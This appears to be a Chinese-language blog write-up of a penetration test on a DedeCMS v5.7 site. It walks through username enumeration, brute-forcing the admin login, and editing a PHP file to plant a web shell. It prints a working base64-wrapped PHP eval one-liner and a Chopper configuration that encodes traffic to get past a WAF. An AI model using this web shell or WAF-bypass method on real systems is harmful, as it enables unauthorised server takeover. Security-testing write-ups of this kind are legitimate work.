記一次織夢cms滲透測試

記一次織夢cms滲透測試

 

0x01 前言

本次測試的整個流程：枚舉用戶名  -  針對性暴破  -  登陸後臺  -  後臺編輯php文件getshell。

0x02 過程

一、登陸功能模塊存在用戶名枚舉缺陷，利用此權限先枚舉出用戶名

 

二、登陸功能模塊無驗證碼，經過枚舉出的用戶名暴力破解出相應密碼。並登陸後臺（dedecms v57）

 

三、開始遇到坑了。文件式管理器上傳文件和新增廣告等方式都沒法getshell（貌似有waf）。一有動做，鏈接就會重置。

 

四、嘗試直接編輯原有文件，將代碼寫入。

（1）寫入phpinfo();能夠成功

 

（2）寫入常規一句話也能成功，可是執行時，鏈接會被重置

（3）寫入base64編碼一句話<?php @eval(base64_decode($_POST[‘0nth3way’]));?>，將數據編碼後就能夠成功執行了

五、菜刀修改配置文件caidao.conf以下，即可鏈接一句話木馬。

<PHP_BASE>
ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpZF0pKTs%%3D&id=%s
</PHP_BASE>

 

六、菜刀成功連上一句話。權限：IIS用戶

 

七、看到一個名爲wkds.exe的進程，感受是防禦軟件，沒有深究。

八、次日就涼了。

（1）馬子還在，菜刀連不上了。能執行phpinfo();，不能執行system(‘whoami’)，查看phpinfo也沒有禁用相關函數啊。問號臉？？？求解答0.0

 

（2）後臺也沒法編輯文件了

0x03 後記

本此測試get到幾點：

（1）流量數據可編碼繞過waf，菜刀改配置鏈接。

（2）及時行樂